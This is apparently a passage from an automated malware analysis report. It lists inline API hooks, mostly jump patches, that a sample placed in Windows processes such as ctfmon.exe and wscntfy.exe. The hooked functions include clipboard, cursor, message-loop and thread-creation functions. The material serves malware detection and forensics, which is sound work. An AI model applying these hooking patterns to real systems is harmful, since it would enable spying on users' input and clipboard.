DefDlgProcWINLINE0xE9 0x92 0x2A 0xA8 0x84 0x45
DefWindowProcAINLINE0xE9 0x9A 0xA0 0x0F 0xFF 0xF5
GetClipboardDataINLINE0xE9 0x92 0x23 0x37 0x79 0x95
OpenInputDesktopINLINE0xE9 0x9C 0xCA 0xAD 0xD3 0x35
PeekMessageAINLINE0xE9 0x9F 0xF5 0x52 0x2E 0xE5
PeekMessageWINLINE0xE9 0x96 0x6F 0xF3 0x3F 0xF6
RegisterClassWINLINE0xE9 0x94 0x42 0x22 0x20 0x06
RegisterClassAINLINE0xE9 0x9C 0xCF 0xFD 0xD9 0x95
GetWindowDCINLINE0xE9 0x93 0x33 0x3B 0xB8 0x85
ReleaseDCINLINE0xE9 0x9F 0xF6 0x6C 0xC1 0x15
SetCaptureINLINE0xE9 0x91 0x13 0x30 0x0D 0xD5
DefMDIChildProcAINLINE0xE9 0x91 0x14 0x4C 0xC9 0x95
DefMDIChildProcWINLINE0xE9 0x93 0x3B 0xBB 0xB8 0x85
DefFrameProcAINLINE0xE9 0x9D 0xD4 0x4C 0xC8 0x85
DefFrameProcWINLINE0xE9 0x9B 0xBD 0xDB 0xB9 0x95
RegisterClassExWINLINE0xE9 0x9F 0xFF 0xF1 0x14 0x46
TranslateMessageINLINE0xE9 0x97 0x7A 0xAF 0xF9 0x95
BeginPaintINLINE0xE9 0x92 0x24 0x4B 0xB7 0x75
RegisterClassExAINLINE0xE9 0x99 0x9A 0xA4 0x48 0x85
GetCursorPosINLINE0xE9 0x99 0x9F 0xF3 0x38 0x85
GetMessagePosINLINE0xE9 0x94 0x4F 0xF3 0x36 0x65
SwitchDesktopINLINE0xE9 0x94 0x4C 0xCC 0xC2 0x25
SetCursorPosINLINE0xE9 0x98 0x81 0x16 0x6E 0xE5
ReleaseCaptureINLINE0xE9 0x95 0x51 0x10 0x0D 0xD5
Process: reader_sl.exe, Module: ntdll.dll
Function NameHook TypeNew Data
ZwCreateThreadINLINE0xE9 0x9C 0xC7 0x79 0x94 0x41
NtCreateThreadINLINE0xE9 0x9C 0xC7 0x79 0x94 0x41
Process: wscntfy.exe, Module: ntdll.dll
Function NameHook TypeNew Data
ZwCloseINLINE0x68 0x8B 0xBA 0xA8 0x89 0x9A
NtCloseINLINE0x68 0x8B 0xBA 0xA8 0x89 0x9A
Process: ctfmon.exe, Module: USER32.dll
Function NameHook TypeNew Data
GetUpdateRectINLINE0xE9 0x90 0x0A 0xAA 0xA0 0x06
CallWindowProcAINLINE0xE9 0x9D 0xDA 0xA1 0x19 0x96
CallWindowProcWINLINE0xE9 0x9F 0xF0 0x02 0x22 0x26
EndPaintINLINE0xE9 0x97 0x7D 0xDB 0xB7 0x76
GetUpdateRgnINLINE0xE9 0x97 0x71 0x15 0x53 0x36
GetDCExINLINE0xE9 0x92 0x25 0x58 0x82 0x26
GetCaptureINLINE0xE9 0x94 0x41 0x13 0x3C 0xC6
DefWindowProcWINLINE0xE9 0x9B 0xB8 0x83 0x33 0x36
GetMessageAINLINE0xE9 0x9B 0xB7 0x75 0x5A 0xA6
GetMessageWINLINE0xE9 0x9F 0xF4 0x43 0x3F 0xF6
DefDlgProcAINLINE0xE9 0x93 0x33 0x3D 0xDC 0xC6
GetDCINLINE0xE9 0x94 0x4E 0xEC 0xC1 0x16
DefDlgProcWINLINE0xE9 0x92 0x2A 0xA8 0x84 0x46
DefWindowProcAINLINE0xE9 0x9A 0xA0 0x0F 0xFF 0xF6
GetClipboardDataINLINE0xE9 0x92 0x23 0x37 0x79 0x96
OpenInputDesktopINLINE0xE9 0x9C 0xCA 0xAD 0xD3 0x36
PeekMessageAINLINE0xE9 0x9F 0xF5 0x52 0x2E 0xE6
PeekMessageWINLINE0xE9 0x96 0x6F 0xF3 0x3F 0xF6
RegisterClassWINLINE0xE9 0x94 0x42 0x22 0x20 0x06
RegisterClassAINLINE0xE9 0x9C 0xCF 0xFD 0xD9 0x96
GetWindowDCINLINE0xE9 0x93 0x33 0x3B 0xB8 0x86
ReleaseDCINLINE0xE9 0x9F 0xF6 0x6C 0xC1 0x16
SetCaptureINLINE0xE9 0x91 0x13 0x30 0x0D 0xD6
DefMDIChildProcAINLINE0xE9 0x91 0x14 0x4C 0xC9 0x96
DefMDIChildProcWINLINE0xE9 0x93 0x3B 0xBB 0xB8 0x86
DefFrameProcAINLINE0xE9 0x9D 0xD4 0x4C 0xC8 0x86
DefFrameProcWINLINE0xE9 0x9B 0xBD 0xDB 0xB9 0x96
RegisterClassExWINLINE0xE9 0x9F 0xFF 0xF1 0x14 0x46
TranslateMessageINLINE0xE9 0x97 0x7A 0xAF 0xF9 0x96
BeginPaintINLINE0xE9 0x92 0x24 0x4B 0xB7 0x76
RegisterClassExAINLINE0xE9 0x99 0x9A 0xA4 0x48 0x86
GetCursorPosINLINE0xE9 0x99 0x9F 0xF3 0x38 0x86
GetMessagePosINLINE0xE9 0x94 0x4F 0xF3 0x36 0x66
SwitchDesktopINLINE0xE9 0x94 0x4C 0xCC 0xC2 0x26
SetCursorPosINLINE0xE9 0x98 0x81 0x16 0x6E 0xE6
ReleaseCaptureINLINE0xE9 0x95 0x51 0x10 0x0D 0xD6
Process: ctfmon.exe, Module: kernel32.dll
Function NameHook TypeNew Data
GetFileAttributesExWINLINE0xE9 0x97 0x71 0x15 0x57 0x72
Process: ctfmon.exe, Module: ntdll.dll
Function NameHook TypeNew Data
ZwCreateThreadINLINE0xE9 0x9C 0xC7 0x79 0x94 0x41
NtCreateThreadINLINE0xE9 0x9C 0xC7 0x79 0x94 0x41

System Behavior